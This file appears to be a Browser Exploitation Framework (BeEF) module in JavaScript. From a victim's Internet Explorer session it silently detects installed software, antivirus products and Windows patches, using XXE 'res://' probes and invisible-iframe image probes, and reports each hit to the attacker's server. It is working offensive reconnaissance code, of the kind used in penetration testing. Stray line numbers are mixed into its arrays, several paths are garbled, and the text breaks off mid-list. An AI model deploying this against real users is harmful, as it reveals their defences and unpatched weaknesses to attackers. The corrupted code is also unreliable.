//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
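// Gate: the module only proceeds when the window object exposes
// ActiveXObject. Any other browser is reported back as unsupported and
// nothing on the local machine is probed.
if (!("ActiveXObject" in window)) {
  beef.debug('[Detect Software] Unsupported browser');
  // The command_url / command_id values are template placeholders that are
  // filled in before this script is served; the failure is sent with an
  // explicit error status.
  beef.net.send('<%= @command_url %>', <%= @command_id %>,'fail=unsupported browser', beef.are.status_error());
  return false;
}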
// Set to true by the XMLDOM self-test once a probe reports a hit; it decides
// which of the two detection techniques the rest of the module uses.
var xmldom_supported = false;

// Fixed path components that every probed path is assembled from: the two
// Program Files directory names, the Windows directory name and the drive
// letter. Only this one drive and these directory names are ever probed.
var program_dirs = ["Program Files", "Program Files (x86)"];
var win_dir = "WINDOWS";
var drive = "C";
/**
 * Probe a local path through the Microsoft.XMLDOM ActiveX control.
 *
 * A minimal XML document whose DOCTYPE names 'res://' + path as its external
 * DTD is handed to loadXML(). The only signal taken from the call is whether
 * it throws; no document content is read back.
 *
 * Callers in this module treat a true result as "the path is present", which
 * is how a web page ends up learning about the local filesystem layout.
 *
 * @param {string} path - Local filesystem path to probe.
 * @returns {boolean} true when loadXML() throws, false when it returns normally.
 */
function detect_folder(path) {
  var doctype = '<!DOCTYPE anything SYSTEM "res://' + path + '">';
  var payload = '<?xml version="1.0" ?>' + doctype;
  var parser = new ActiveXObject("Microsoft.XMLDOM");
  var threw = false;

  parser.async = true;
  try {
    parser.loadXML(payload);
  } catch (e) {
    // The exception itself is the result; its details are not inspected.
    threw = true;
  }
  return threw;
}
// Self-test for the XMLDOM XXE technique: probe each Program Files directory
// in turn and stop at the first one that reports a hit. If none does,
// xmldom_supported stays false and the module uses the 'res' image technique
// instead.
for (var d = 0; d < program_dirs.length && !xmldom_supported; d++) {
  if (detect_folder(drive + ":\\" + program_dirs[d])) {
    xmldom_supported = true;
  }
}
// Software signatures for the XMLDOM XXE technique: [reported name, folder path relative to each Program Files directory]
var software = [
45
['7zip', '7-Zip'],
46
['Acoustica MP3 Audio Mixer', 'Acoustica MP3 Audio Mixer'],
47
['Autodesk AutoCAD 2015', 'Autodesk\\AutoCAD 2015'],
48
['Autodesk AutoCAD 2016', 'Autodesk\\AutoCAD 2016'],
49
['Adobe Help', 'Adobe\\Adobe Help Viewer'],
50
['Adobe Professional 7', 'Adobe\\Acrobat 7.0'],
51
['Adobe Reader 7', 'Adobe\\Reader 7.0\\Reader'],
52
['Adobe Reader 8', 'Adobe\\Reader 8.0\\Reader'],
53
['Adobe Reader 9', 'Adobe\\Reader 9.0\\Reader'],
54
['Adobe Reader 10', 'Adobe\\Reader 10.0\\Reader'],
55
['Adobe Reader 11', 'Adobe\\Reader 11.0\\Reader'],
56
['Ahead Nero', 'ahead'],
57
['AirPcap', 'Riverbed\\AirPcap'],
58
['Apple Software Update', 'Apple Software Update'],
59
['Azureus', 'azureus'],
60
['Baidu', 'baidu'],
61
['BitComet', 'BitComet'],
62
['BitSpirit', 'BitSpirit'],
63
['BioExplorer', 'BioExplorer'],
64
['Cisco Prime Data Center Network Manager', 'Cisco Systems\\dcm'],
65
['Citrix', 'Citrix'],
66
['DbVisualizer', 'DbVisualizer'],
67
['eMule', 'eMule'],
68
['eMule', 'easyMule2'],
69
['Flash MX 2004', 'Macromedia\\Flash MX 2004'],
70
['Flashget', 'FlashGet'],
71
['Flashget 3', 'FlashGet Network\\FlashGet 3'],
72
['FoxIt Reader', 'Foxit Software'],
73
['FoxIt Reader', 'Foxit Reader'],
74
['Free Nokia Ringtone Converter', 'Free Nokia Ringtone Converter'],
75
['Git', 'Git'],
76
['Gnome Music Player Client', 'Gnome Music Player Client'],
77
['GnuPG', 'GNU\\GnuPG'],
78
['Heroku', 'Heroku'],
79
['HP AutoPass License Server', 'HP\\HP AutoPass License Server'],
80
['HP TRIM', 'Hewlett-Packard\\HP TRIM'],
81
['IceWeasel', 'IceWeasel'],
82
['IncredibleCharts', 'IncredibleCharts'],
83
['Internet Explorer', 'Internet Explorer'],
84
['iTunes', 'iTunes'],
85
['Java JRE 6', 'Java\\jre6'],
86
['Java JRE 7', 'Java\\jre7'],
87
['Java JRE 8', 'Java\\jre8'],
88
['JetBrains dotPeek', 'JetBrains\\dotPeek'],
89
['Juniper Network Connect 8.1', 'Juniper Networks\\Network Connect 8.1'],
90
['JXplorer', 'jxplorer'],
91
['Lexmark Markvision Enterprise', 'Lexmark\\Markvision Enterprise'],
92
['Magellan MapSend Lite', 'Magellan\MapSend Lite'],
93
['Microsoft Baseline Security Analyzer 2', 'Microsoft Baseline Security Analyzer 2'],
94
['Microsoft Live Meeting 7', 'Microsoft Office\\live meeting 7'],
95
['Microsoft SQL Server', 'Microsoft SQL Server'],
96
['Microsoft SQL Server Compact Edition', 'Microsoft SQL Server Compact Edition'],
97
['Microsoft Virtual PC', 'Microsoft Virtual PC'],
98
['Microsoft Visual Studio 8', 'Microsoft Visual Studio 8'],
99
['Microsoft Visual Studio 9', 'Microsoft Visual Studio 9'],
100
['Microsoft Visual Studio 10', 'Microsoft Visual Studio 10'],
101
['Microsoft Visual Studio 11', 'Microsoft Visual Studio 11'],
102
['Microsoft Visual Studio 12', 'Microsoft Visual Studio 12'],
103
['mIRC', 'mIRC'],
104
['Mozilla Firefox', 'Mozilla Firefox'],
105
['MSN Messenger', 'Messenger'],
106
['NipperStudio', 'NipperStudio'],
107
['KeePass Password Safe 2', 'KeePass Password Safe 2'],
108
['NetBeans 8.1', 'NetBeans 8.1'],
109
['NeuroServer', 'NeuroServer'],
110
['Nokia PC Suite', 'Nokia\\Connectivity Cable Driver'],
111
['Notepad Plus Plus', 'Notepad++'],
112
['Opera', 'Opera'],
113
['Oracle JavaFX 2.0 Runtime', 'Oracle\\JavaFX 2.0 Runtime'],
114
['Outlook Express', 'Outlook Express'],
115
['Paritech Pulse', 'Paritech\\Pulse'],
116
['PGP Desktop', 'PGP Corporation\\PGP Desktop'],
117
['Picasa2', 'picasa2'],
118
['Proxifier', 'Proxifier'],
119
['QuickTime', 'QuickTime'],
120
['QLogic SANsurfer', 'QLogic Corporation\SANsurfer'],
121
['radmin', 'Radmin'],
122
['Real VNC4', 'RealVNC\\VNC4'],
123
['RedGate .NET Reflector', 'Red Gate\\.NET Reflector'],
124
['Resource Hacker', 'Resource Hacker'],
125
['Safari', 'Safari'],
126
['SeaMonkey', 'SeaMonkey'],
127
['SiteKiosk', 'SiteKiosk'],
128
['Spark', 'Spark'],
129
['TeamSpeak 3 Client', 'TeamSpeak 3 Client'],
130
['TinaSoft Easy Cafe Server', 'TinaSoft\\Easy Cafe Server'],
131
['Trend Micro Deep Security Manager', 'Trend Micro\\Deep Security Manager'],
132
['TrueCrypt', 'TrueCrypt'],
133
['TopShare Portfolio Manager v2', 'TopShare Portfolio Manager V2'],
134
['Samsung USB Drivers for Mobile Phones', 'SAMSUNG\\USB Drivers'],
135
['Secure CRT', 'SecureCRT'],
136
['Serv—U', 'RhinoSoft.com\\Serv—U'],
137
['Skype', 'Skype\\Phone'],
138
['SoapUI 5.0.0', 'SmartBear\\SoapUI-5.0.0'],
139
['Thunder', 'Thunder Network\\Thunder'],
140
['Thunder', 'Thunder Network\\Thunder6'],
141
['Tencent QQDownload', 'Tencent\\QQDownload'],
142
['VLC', 'VideoLAN\\VLC'],
143
['Ultramon', 'ultramon\\ultramondesktop.exe'],
144
['Unreal Media Server', 'UnrealStreaming\\UMediaServer'],
145
['uTorrent', 'uTorrent'],
146
['VMware Workstation', 'vmware\\vmware workstation'],
147
['VMware Tools', 'VMware\\VMware Tools'],
148
['VMware Workstation', 'VMware\\VMware Workstation'],
149
['VirtualBox Guest Additions', 'Oracle\\VirtualBox Guest Additions'],
150
['Winamp', 'winamp'],
151
['Windows DVD Maker', 'DVD Maker'],
152
['Windows Journal', 'Windows Journal'],
153
['Windows Media Player', 'Windows Media Player'],
154
['Windows Mail', 'Windows Mail'],
155
['Windows Movie Maker', 'Movie Maker'],
156
['Windows NetMeeting', 'NetMeeting'],
157
['Windows Photo Viewer', 'Windows Photo Viewer'],
158
['WinHex', 'WinHex'],
159
['WinRAR', 'WinRAR'],
160
['WinZip', 'WinZip'],
161
['Wireshark', 'Wireshark'],
162
['WinPcap', 'WinPcap'],
163
['WinSCP', 'WinSCP'],
164
['XFire', 'xfire'],
165
['Xming', 'Xming X Server'],
166
['Yahoo Messenger', 'Yahoo!\\Messenger'],
167
168
// AntiVirus
169
['360Safe', '360\\360Safe'],
170
['360Safe', '360Safe'],
171
['A-Squared Anti-Malware', 'A-Squared Anti-Malware'],
172
['Agnitum Outpost Security Suite Pro', 'Agnitum\\Outpost Security Suite Pro'],
173
['AhnLab', 'AhnLab'],
174
['ESET Smart Security', 'ESET\\ESET Smart Security'],
175
['ESTsoft ALYac Internet Security', 'ESTsoft\\ALYac'],
176
['AhnLab', 'AhnLab\\Smart Update Utility'],
177
['AhnLab V3 Internet Security Lite', 'AhnLab\\V3Lite'],
178
['Avast AntiVirus 4', 'Alwil Software\\Avast4'],
179
['Avast AntiVirus', 'AVAST Software\\Avast'],
180
['AVG 2012', 'AVG\\AVG2012'],
181
['AVG', 'AVG Secure Search'],
182
['Avira AntiVir Desktop', 'Avira\\AntiVir Desktop'],
183
['Avira AntiVir Personal Edition', 'Avira\\AntiVir PersonalEdition Classic'],
184
['BitDefender', 'BitDefender'],
185
['DrWeb AntiVirus', 'DrWeb'],
186
['eScan AntiVirus', 'eScan'],
187
['F-Secure ExploitShield', 'F-Secure\\ExploitShield'],
188
['F-Secure Internet Security', 'F-Secure Internet Security\\FSPS'],
189
['F-PROT Antivirus', 'FRISK Software\\F-PROT Antivirus for Windows'],
190
['Kaspersky Internet Security 2012', 'Kaspersky Lab\\Kaspersky Internet Security 2012'],
191
['Kaspersky Anti-Virus 2009', 'Kaspersky Lab\\Kaspersky Anti-Virus 2009'],
192
['Kaspersky Anti-Virus 2010', 'Kaspersky Lab\\Kaspersky Anti-Virus 2010'],
193
['Kaspersky Anti-Virus 2011', 'Kaspersky Lab\\Kaspersky Anti-Virus 2011'],
194
['Kaspersky Anti-Virus 2012', 'Kaspersky Lab\\Kaspersky Anti-Virus 2012'],
195
['Kaspersky Anti-Virus 2013', 'Kaspersky Lab\\Kaspersky Anti-Virus 2013'],
196
['Kaspersky Anti-Virus 2014', 'Kaspersky Lab\\Kaspersky Anti-Virus 2014'],
197
['Kaspersky Endpoint Security 8', 'Kaspersky Lab\\Kaspersky Endpoint Security 8 for Windows'],
198
['Kaspersky Internet Security 2010', 'Kaspersky Lab\\Kaspersky Internet Security 2010'],
199
['Kaspersky Internet Security 2009', 'Kaspersky Lab\\Kaspersky Internet Security 2009'],
200
['Kingsoft AntiVirus', 'KingSoft\\kingsoft antivirus'],
201
['IKARUS anti.virus', 'IKARUS\\anti.virus'],
202
['Immunet AntiVirus', 'Immunet'],
203
['JiangMin AntiVirus', 'JiangMin\\AntiVirus'],
204
['Micropoint AntiVirus', 'Micropoint'],
205
['Microsoft EMET 4.1', 'EMET 4.1'],
206
['Microsoft EMET 5.0', 'EMET 5.0'],
207
['McAfee Total Protection 2011', 'McAfeeMOBK'],
208
['McAfee Enterprise', 'McAfee\\VirusScan Enterprise'],
209
['McAfee Security Center', 'McAfee\\MSC'],
210
['Norman Scan Engine', 'Norman\\Nse'],
211
['Norton Internet Security', 'Norton Internet Security'],
212
['Norton AntiVirus', 'Norton AntiVirus'],
213
['nProtect Anti-Virus Spyware 3.0', 'INCAInternet\\nProtect Anti-Virus Spyware 3.0'],
214
['PC Tools Antivirus Software', 'PC Tools Antivirus Software'],
215
['Quick Heal Total Security', 'Quick Heal\\Quick Heal Total Security'],
216
['Sucop Antivirus', 'Sucop\\SecPlugin'],
217
['Rising AntiVirus', 'Rising\\RAV'],
218
['Rising AntiVirus', 'Rising\\RIS'],
219
['Rising Firewall', 'Rising\\RFW'],
220
['Sunbelt Software Personal Firewall', 'Sunbelt Software\\Personal Firewall'],
221
['Sophos Sophos Anti-Virus', 'Sophos\\Sophos Anti-Virus'],
222
['Sophos Client Firewall', 'Sophos\\Sophos Client Firewall'],
223
['SUPERAntiSpyware', 'SUPERAntiSpyware'],
224
['Symantec Endpoint Protection', 'Symantec\\Symantec Endpoint Protection'],
225
['Symantec Antivirus', 'symantec_client_security\\symantec antivirus'],
226
['Trend Micro Internet Security', 'Trend Micro\\Internet Security'],
227
['Trend Micro OfficeScan Client', 'Trend Micro\\OfficeScan Client'],
228
['VirusBuster', 'VirusBuster'],
229
['Windows Defender', 'Windows Defender'],
230
['ZoneAlarm', 'Zone Labs\\ZoneAlarm'],
231
232
// Office
233
['Microsoft Office', 'Microsoft Office\\OFFICE'],
234
['Microsoft Office 10', 'Microsoft Office\\OFFICE10'],
235
['Microsoft Office 11', 'Microsoft Office\\OFFICE11'],
236
['Microsoft Office 12', 'Microsoft Office\\OFFICE12'],
237
['Microsoft Office 13', 'Microsoft Office\\OFFICE13'],
238
['Microsoft Office 14', 'Microsoft Office\\OFFICE14'],
239
['WPS Office', 'Kingsoft\\Kingsoft Office'],
240
['WPS Office Personal', 'Kingsoft\\WPS Office Personal'],
241
['WPS Office 2008', 'Kingsoft\\WPS Office 2008'],
242
['WPS Office 2009', 'Kingsoft\\WPS Office 2009'],
243
['WPS Office 2010', 'Kingsoft\\WPS Office 2010'],
244
245
// Security
246
['Cain', 'Cain'],
247
['Echo Mirage', 'Echo Mirage'],
248
['Fiddler2', 'Fiddler2'],
249
['L0pht Crack 5', '@stake\\LC5'],
250
['Immunity Debugger', 'Immunity Inc\\Immunity Debugger'],
251
['Network Miner v2.1', 'NetworkMiner_2-1'],
252
['Nmap', 'nmap'],
253
254
// VPN
255
['Checkpoint Endpoint Connect', 'Checkpoint\\Endpoint Connect'],
256
['Cisco AnyConnect Secure Mobility Client', 'Cisco AnyConnect Secure Mobility Client'],
257
['Cisco AnyConnect VPN Client', 'Cisco AnyConnect VPN Client'],
258
['Fortinet FortiClient', 'Fortinet\\FortiClient'],
259
['OpenVPN', 'OpenVPN']
260
];
// XMLDOM pass over the software list: every signature folder is probed under
// every Program Files directory, and each hit is sent back as its own
// "installed_software=<name>" message. The list includes security products,
// so the result tells the remote side which defences are installed.
if (xmldom_supported) {
  beef.debug('[Detect Software] Enumerating software...');
  for (var i = 0; i < program_dirs.length; i++) {
    var base = drive + ":\\" + program_dirs[i] + "\\";
    for (var j = 0; j < software.length; j++) {
      var path = base + software[j][1];
      if (!detect_folder(path)) {
        continue;
      }
      beef.debug('[Detect Software] Found software: ' + path);
      beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_software=" + software[j][0]);
    }
  }
}
// Patch identifiers to enumerate (Win XP only); each is probed as a $NtUninstall<KB>$ folder under the Windows directory
var patches = [
278
'KB2570947',
279
'KB2584146',
280
'KB2585542',
281
'KB2592799',
282
'KB2598479',
283
'KB2603381',
284
'KB2619339',
285
'KB2620712',
286
'KB2631813',
287
'KB2653956',
288
'KB2655992',
289
'KB2659262',
290
'KB2661637',
291
'KB2676562',
292
'KB2686509',
293
'KB2691442',
294
'KB2698365',
295
'KB2705219-v2',
296
'KB2712808',
297
'KB2719985',
298
'KB2723135-v2',
299
'KB2727528',
300
'KB2749655',
301
'KB2757638',
302
'KB2770660',
303
'KB2780091',
304
'KB2802968',
305
'KB2803821-v2_WM9',
306
'KB2807986',
307
'KB2813345',
308
'KB2820917',
309
'KB2834886',
310
'KB2847311',
311
'KB2850869',
312
'KB2859537',
313
'KB2862152',
314
'KB2862330',
315
'KB2862335',
316
'KB2864063',
317
'KB2868038',
318
'KB2868626',
319
'KB2876217',
320
'KB2876331',
321
'KB2892075',
322
'KB2893294',
323
'KB2898715',
324
'KB2900986',
325
'KB2904266',
326
'KB2909212',
327
'KB2914368',
328
'KB2916036',
329
'KB2922229',
330
'KB2929961',
331
'KB2930275',
332
'KB2934207',
333
'KB2936068',
334
'KB2964358',
335
'KB898461',
336
'KB923561',
337
'KB946648',
338
'KB950762',
339
'KB950974',
340
'KB951376-v2',
341
'KB951978',
342
'KB952004',
343
'KB952069_WM9',
344
'KB952287',
345
'KB952954',
346
'KB953155',
347
'KB954155_WM9',
348
'KB955759',
349
'KB956572',
350
'KB956844',
351
'KB959426',
352
'KB960803',
353
'KB960859',
354
'KB961118',
355
'KB968389',
356
'KB969059',
357
'KB970430',
358
'KB970483',
359
'KB971029',
360
'KB971657',
361
'KB972270',
362
'KB973507',
363
'KB973540_WM9',
364
'KB973815',
365
'KB973869',
366
'KB973904',
367
'KB974112',
368
'KB974318',
369
'KB974392',
370
'KB974571',
371
'KB975025',
372
'KB975467',
373
'KB975558_WM8',
374
'KB975560',
375
'KB975713',
376
'KB976323',
377
'KB977816',
378
'KB977914',
379
'KB978338',
380
'KB978542',
381
'KB978695_WM9',
382
'KB978706',
383
'KB979309',
384
'KB979482',
385
'KB979687',
386
'KB981997',
387
'KB982132',
388
'KB982665'
389
];
// XMLDOM pass over the patch list: a patch counts as installed when its
// "$NtUninstall<KB>$" folder under the Windows directory reports a hit.
// Each hit is sent back as its own "installed_patches=<KB>" message, which
// in effect discloses the host's patch level.
if (xmldom_supported) {
  beef.debug("[Detect Software] Enumerating installed patches...");
  var uninstall_root = drive + ":\\" + win_dir + "\\$NtUninstall";
  for (var i = 0; i < patches.length; i++) {
    var path = uninstall_root + patches[i] + "$";
    if (!detect_folder(path)) {
      continue;
    }
    beef.debug('[Detect Software] Found patch: ' + path);
    beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + patches[i]);
  }
}
// When the XMLDOM XXE technique worked, software and patches have already
// been enumerated above, so the 'res' scheme technique below is skipped.
if (xmldom_supported) {
  return;
}

// Fallback: detect software using the 'res' scheme and EXE/DLL resource
// images. Every probe is an image element attached to a hidden iframe
// obtained from beef.dom, so nothing is rendered in the visible page.
var dom = beef.dom.createInvisibleIframe();
// 'res' technique, patches (Win XP only). Each row is
// [KB identifier, resource reference inside that patch's $NtUninstall folder];
// the trailing comment is the bulletin recorded by the original author.
// This re-declares the `patches` name already used for the XMLDOM list
// earlier in the same function.
var patches = [
  ["KB2964358", "mshtml.dll/2/2030"],       // MS14-021
  ["KB2936068", "mshtmled.dll/2/2503"],     // MS14-018
  ["KB2864063", "themeui.dll/2/120"],       // MS13-071
  ["KB2859537", "ntkrpamp.exe/2/1"],        // MS13-063
  ["KB2813345", "mstscax.dll/2/101"],       // MS13-029
  ["KB2820917", "winsrv.dll/#2/#512"],      // MS13-033
  ["KB2691442", "shell32.dll/2/130"],       // MS12-048
  ["KB2676562", "ntkrpamp.exe/2/1"],        // MS12-034
  ["KB2506212", "mfc42.dll/#2/#26567"],     // MS11-024
  ["KB2483185", "shell32.dll/2/130"],       // MS11-006
  ["KB2481109", "mstsc.exe/#2/#620"],       // MS11-017
  ["KB2443105", "isign32.dll/2/#101"],      // MS10-097
  ["KB2393802", "ntkrnlpa.exe/2/#1"],       // MS11-011
  ["KB2387149", "mfc40.dll/#2/#26567"],     // MS10-074
  ["KB2296011", "comctl32.dll/#2/#120"],    // MS10-081
  ["KB979687", "wordpad.exe/#2/#131"],      // MS10-083
  ["KB978706", "mspaint.exe/#2/#102"],      // MS10-005
  ["KB977914", "iyuv_32.dll/2/INDEOLOGO"],  // MS10-013
  ["KB973869", "dhtmled.ocx/#2/#1"]         // MS09-037
];

// A probe image that loads is reported as an installed patch (the KB
// identifier travels in the element's title); a probe that errors is just
// discarded. Either way the element is removed from the hidden iframe.
var on_patch_probe_load = function() {
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "installed_patches=" + this.title);
  dom.removeChild(this);
};
var on_patch_probe_error = function() {
  dom.removeChild(this);
};

beef.debug("[Detect Software] Enumerating installed patches...");
var uninstall_prefix = "res://" + drive + ":\\" + win_dir + "\\$NtUninstall";
for (var p = 0; p < patches.length; p++) {
  var probe = new Image;
  probe.title = patches[p][0];
  probe.src = uninstall_prefix + patches[p][0] + "$\\" + patches[p][1];
  probe.onload = on_patch_probe_load;
  probe.onerror = on_patch_probe_error;
  dom.appendChild(probe);
}
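// Software signatures for the 'res' technique: [reported name, file path relative to each Program Files directory followed by a resource reference]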
var software = [
447
["7zip", "7-Zip\\7zFM.exe/2/2002"],
448
["Adobe Help", "Adobe\\Adobe Help Viewer\\1.0\\ahv.exe/#2/#132"],
449
["Baidu", "baidu\\Baidu Hi\\BaiduHi.exe/#2/#152"],
450
["Cain", "Cain\\UNWISE.EXE/2/106"],
451
["Echo Mirage", "Echo Mirage\\unins000.exe/2/DISKIMAGE"],
452
["FoxIt Reader", "Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/257"],
453
["FoxIt Reader", "Foxit Reader\\Foxit Reader.exe/#2/#484"],
454
["Internet Explorer", "Internet Explorer\\iedvtool.dll/2/4000"],
455
["Outlook Express", "Outlook Express\\msoeres.dll/2/1"],
456
["KeePass Password Safe 2", "KeePass Password Safe 2\\unins000.exe/2/DISKIMAGE"],
457
["Nokia PC Suite", "Nokia\\Connectivity Cable Driver\\nmwcdcocls.dll/2/131"],
458
["Notepad Plus Plus", "Notepad++\\uninstall.exe/2/110"],
459
["OpenVPN", "OpenVPN\\Uninstall.exe/2/110"],
460
["Oracle JavaFX 2.0 Runtime", "Oracle\\JavaFX 2.0 Runtime\\bin\\eula.dll/2/204"],
461
["Resource Hacker", "Resource Hacker\\ResHacker.exe/2/128"],
462
["Samsung USB Drivers for Mobile Phones", "SAMSUNG\\USB Drivers\\Uninstall.exe/2/132"],
463
["Tencent QQDownload", "Tencent\\QQDownload\\QQDownload.exe/2/132"],
464
["QuickTime", "QuickTime\\QTinfo.exe/2/101"],
465
["QuickTime", "QuickTime\\quicktimeplayer.exe/#2/#403"],
466
["VLC", "VideoLAN\\VLC\\npvlc.dll/2/3"],
467
["Immunity Debugger", "Immunity Inc\\Immunity Debugger\\ImmunityDebugger.exe/2/GOTO"],
468
["Java JRE 6", "Java\\jre6\\bin\\awt.dll/2/CHECK_BITMAP"],
469
["Java JRE 7", "Java\\jre7\\bin\\awt.dll/2/CHECK_BITMAP"],
470
["Java JRE 8", "Java\\jre8\\bin\\awt.dll/2/CHECK_BITMAP"],
471
["VMware Tools", "VMware\\VMware Tools\\TPVCGatewaydeu.dll/2/30994"],
472
["VMware Tools", "VMware\\VMware Tools\\TPAutoConnSvc.exe/#2/30995"],
473
["VMware Workstation", "VMware\\VMware Workstation\\vmplayer.exe/#2/5"],
474
["VMware Workstation", "VMware\\VMware Workstation\\vmware.exe/#2/#508"],
475
["VirtualBox Guest Additions", "Oracle\\VirtualBox Guest Additions\\uninst.exe/#2/110"],
476
["Windows DVD Maker", "DVD Maker\\DVDMaker.exe/2/438"],
477
["Windows Journal", "Windows Journal\\Journal.exe/2/112"],
478
["Windows Mail", "Windows Mail\\msoeres.dll/2/1"],
479
["Windows Movie Maker", "Movie Maker\\wmm2res.dll/2/201"],
480
["Windows NetMeeting", "NetMeeting\\nmchat.dll/2/207"],
481
["Windows Photo Viewer", "Windows Photo Viewer\\PhotoViewer.dll/2/#51209"],
482
["WinRAR", "WinRAR\\WinRAR.exe/#2/#150"],
483
["Microsoft Virtual PC", "Microsoft Virtual PC\\Virtual PC.exe/#2/150"],
484
["Wireshark", "Wireshark\\uninstall.exe/2/110"],
485
486
// AntiVirus software
487
["360Safe", '360\\360Safe\\360leakfixer.exe/#2/110'],
488
["360Safe", '360\\360Safe\\repairleakdll.dll/GIF/154'],
489
["360Safe", '360Safe\\live.dll/#2/#203'],
490
["360Safe", '360\\360safe\\360Safe.exe/2/131'],
491
["ESTsoft ALYac Internet Security", 'ESTsoft\\ALYac\\AYUpdate.aye/2/30994'],
492
["AhnLab", 'AhnLab\\Smart Update Utility\\SUpdate.exe/2/153'],
493
["AhnLab V3 Internet Security Lite", 'AhnLab\\V3Lite\\V3LTray.exe/2/132'],
494
["Avast AntiVirus 4", 'Alwil Software\\Avast4\\ashAvast.exe/2/267'],
495
["Avast AntiVirus", 'AVAST Software\\Avast\\aswAra.dll/#2/101'],
496
["AVG 2012", 'AVG\\AVG2012\\avguires.dll/#2/111'],
497
["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\ccquarc.dll/#2/101'],
498
["Avira AntiVir Desktop", 'Avira\\AntiVir Desktop\\setup.dll/#2/132'],
499
["Avira AntiVir Personal Edition", 'Avira\\AntiVir PersonalEdition Classic\\setup.dll/#2/#132'],
500
["DrWeb AntiVirus", 'DrWeb\\spideragent.exe/#2/133'],
501
["Kaspersky Internet Security 2012", 'Kaspersky Lab\\Kaspersky Internet Security 2012\\basegui.ppl/#2'],
502
["Kaspersky Anti-Virus 2009", 'Kaspersky Lab\\Kaspersky Anti-Virus 2009\\oeas.dll/2/206'],
503
["Kaspersky Anti-Virus 2010", 'Kaspersky Lab\\Kaspersky Anti-Virus 2010\\shellex.dll/2/103'],
504
["Kaspersky Internet Security 2010", 'Kaspersky Lab\\Kaspersky Internet Security 2010\\shellex.dll/2/103'],
505
["Kaspersky Internet Security 2009", 'Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206'],
506
["Kingsoft AntiVirus", 'KingSoft\\kingsoft antivirus\\kislive.exe/#2/102'],
507
["Rising AntiVirus", 'Rising\\RAV\\RavUsb.exe/#2/112'],
508
["Rising AntiVirus", 'Rising\\Ris\\SetUp.exe/2/147'],
509
["ESET Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/#2/1070'],
510
["JiangMin AntiVirus", 'JiangMin\\AntiVirus\\VirusBox.exe/#2/128'],
511
["JiangMin AntiVirus", 'JiangMin\\Install\\KVOL.exe/2/202'],
512
["Micropoint AntiVirus", 'Micropoint\\mfc90.dll/#2/30994'],
513
["McAfee Total Protection 2011", 'McAfeeMOBK\\BootStrap.exe/#2/30994'],
514
["McAfee Enterprise", 'McAfee\\VirusScan Enterprise\\graphics.dll/2/202'],
515
["McAfee Security Center", 'McAfee\\MSC\\mclgview.exe/2/129'],
516
["Norton Internet Security 16.0.0.125", 'Norton Internet Security\\Engine\\16.0.0.125\\SymSHAx9.dll/2/102'],
517
["Norton Internet Security 16.5.0.135", 'Norton Internet Security\\Engine\\16.5.0.135\\SymSHAx9.dll/2/102'],
518
["Norton AntiVirus 17.5.0.127", 'Norton AntiVirus\\MUI\\17.5.0.127\\images\\cssbase.dll/2/SCANTASKWZ_SCAN_ITEM_LIST.BMP'],
519
["NOD32 Smart Security", 'ESET\\ESET Smart Security\\eguiEpfw.dll/2/1070'],
520
["Trend Micro Internet Security", 'Trend Micro\\Internet Security\\UfSeAgnt.exe/2/30994'],
521
["Trend Micro OfficeScan Client", 'Trend Micro\\OfficeScan Client\\PcNTMon.exe/2/30994'],
522
["Sucop Antivirus", 'Sucop\\SecPlugin\\SecPlugin.dll/#2/211'],
523
["Sophos Client Firewall", 'Sophos\\Sophos Client Firewall\\logo_rc.dll/2/114'],
524
["Symantec Endpoint Protection", 'Symantec\\LiveUpdate\\AUPDATE.exe/2/129'],
525
["ZoneAlarm", 'Zone Labs\\ZoneAlarm\\alert.zap/2/176'],
526
527
// The following signatures were taken from:
528
// https://www.alienvault.com/blogs/labs-research/attackers-abusing-internet-explorer-to-enumerate-software-and-detect-securi
529
["Microsoft Office 97", "Microsoft Office\\OFFICE\\BINDER.EXE/16/1"],
530
["Microsoft Office 2000", "Microsoft Office\\OFFICE\\WINWORD.EXE/16/1"],
531
["Microsoft Office XP", "Microsoft Office\\OFFICE10\\WINWORD.EXE/16/1"],
532
["Microsoft Office 2003", "Microsoft Office\\OFFICE11\\WINWORD.EXE/16/1"],
533
["Microsoft Office 2007", "Microsoft Office\\OFFICE12\\WINWORD.EXE/16/1"],
534
["Microsoft Office 2010", "Microsoft Office\\OFFICE14\\WINWORD.EXE/16/1"],
535
["WPS Office Personal", "Kingsoft\\WPS Office Personal\\utility\\repairinst.exe/16/1"],
536
["WPS Office 2008", "Kingsoft\\WPS Office 2008\\utility\\repairinst.exe/16/1"],
537
["WPS Office 2009", "Kingsoft\\WPS Office 2009\\utility\\repairinst.exe/16/1"],
538
["WPS Office 2010", "Kingsoft\\WPS Office 2010\\utility\\repairinst.exe/16/1"],
539
["WinRar 3.5", "WinRAR\\WinRar.exe/6/90"],
540
["WinRar 3.6", "WinRAR\\WinRar.exe/6/91"],
541
["WinRar 3.7", "WinRAR\\WinRar.exe/6/92"],
542
["WinRar 3.8", "WinRAR\\WinRar.exe/6/93"],
543
["WinRar 3.9", "WinRAR\\RarExt.d11/24/2"],
544
["WinZip", "WinZip\\WinZip32.exe/16/1"],
545
["7zip", "7—Zip\\7zFm.exe/16/1"],
546
["Adobe Reader 7", "Adobe\\Reader 7.0\\Reader\\AXEParser.d11/16/1"],
547
["Adobe Professional 7", "Adobe\\Acrobat 7.0\\Acrobat\\Acrobat.dll/16/1"],
548
["Adobe Reader 8", "Adobe\\Reader 8.0\\Reader\\AdobeXMP.d11/16/1"],
549
["Adobe Reader 9", "Adobe\\Reader 9.0\\Reader\\AcroRd32.exe/16/1"],
550
["Adobe Reader 10", "Adobe\\Reader 10.0\\Reader\\AcroRd32.exe/16/1"],
551
["Skype", "Skype\\Phone\\Skype.exe/16/1"],
552
["Skype", "Skype\\Phone\\sktransfer.d11/16/1"],
553
["Microsoft Outlook 6", "Outlook Express\\msimn.exe/16/1"],
554
["Microsoft Outlook 2000", "Microsoft Office\\OFFICE\\OUTLOOK.EXE/16/1"],
555
["Microsoft Outlook XP", "Microsoft Office\\OFFICE10\\OUTLOOK.EXE/16/1"],
556
